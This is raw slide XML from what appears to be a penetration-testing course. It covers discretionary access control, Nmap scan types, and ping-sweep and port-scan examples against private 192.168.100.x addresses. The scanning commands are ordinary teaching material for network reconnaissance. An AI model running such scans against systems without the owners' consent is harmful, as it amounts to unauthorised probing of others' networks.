          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="82945" tIns="41473" rIns="82945" bIns="41473" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21563" name="Connettore 1 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="100013" y="1419225"/>
            <a:ext cx="1944687" cy="777875"/>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1343460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Discretionary Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="7848600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Discretionary access control, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> DAC, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>refers to a scheme where users are given the ability to determine the permissions governing access to their own files. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DAC typically features the concept of both users and groups, and allows users to set access-control measures in terms of these categories. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In addition, DAC schemes allow users to grant privileges on resources to other users on the same system.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF99276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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Penetration Test</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Tutorial</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B7DAB201-70AB-4727-A64B-4AC547491A03}"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C83D5729-B398-47B5-9115-39CF543D35E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>40</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267360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tretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4500562" y="2143116"/>
            <a:ext cx="5467352" cy="3216089"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:tint val="66000"/>
                  <a:satMod val="160000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:tint val="66000"/>
                  <a:satMod val="160000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="50000">
                <a:schemeClr val="accent1">
                  <a:tint val="44500"/>
                  <a:satMod val="160000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:tint val="23500"/>
                  <a:satMod val="160000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="2700000" scaled="0"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent2">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="perspectiveContrastingLeftFacing"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rettangolo 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="0"/>
            <a:ext cx="8215313" cy="769938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>(Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Mapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="CasellaDiTesto 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500063" y="762000"/>
            <a:ext cx="8643937" cy="6432550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port Division </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> open, closed, filtered, unfiltered, open|filtered and closed|filtered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scanning techniques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(TCP SYN scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(TCP connect() scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(UDP scans)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(TCP ACK scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(TCP Window scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(TCP Maimon scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--scanflags </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Custom TCP scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;zombie host[:probeport]&gt; (Idlescan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(IP protocol scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sN; -sF; -sX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(TCP Null, FIN, and Xmas scans)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;ftp relay host&gt; (FTP bounce scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2200"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" u="sng"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto data 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3F75EEDC-C555-457F-BD4A-488F3B7C4075}"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FD562699-5B86-46F9-AEE7-E793E91835BE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Segnaposto piè di pagina 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4237503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linds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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xEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18">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xEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18">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
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18">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8">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18">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
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18">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xEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18">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8">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18">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8">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18">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8">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18">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8">
                                            <p:txEl>
                                              <p:pRg st="13" end="13"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18">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8">
                                            <p:txEl>
                                              <p:pRg st="14" end="14"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18">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027"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="5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p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Identify active hosts and services</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> in the network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395288" y="1196975"/>
            <a:ext cx="8424862" cy="5184775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" smtClean="0"/>
              <a:t>ping sweep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" smtClean="0"/>
              <a:t>useful to identify targets and to verify also rogue hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" smtClean="0"/>
              <a:t>Ex:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" smtClean="0"/>
              <a:t>nmap -v -sP 192.168.100.0/24 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>-sP Ping scan. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" smtClean="0"/>
              <a:t>port scanning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" smtClean="0"/>
              <a:t> useful to identify active ports (services or daemons) that are running on the targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" smtClean="0"/>
              <a:t>Ex:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" smtClean="0"/>
              <a:t>nmap -v -sT 192.168.100.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>-sT normal scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>-sS stealth scan</a:t>
            </a:r>
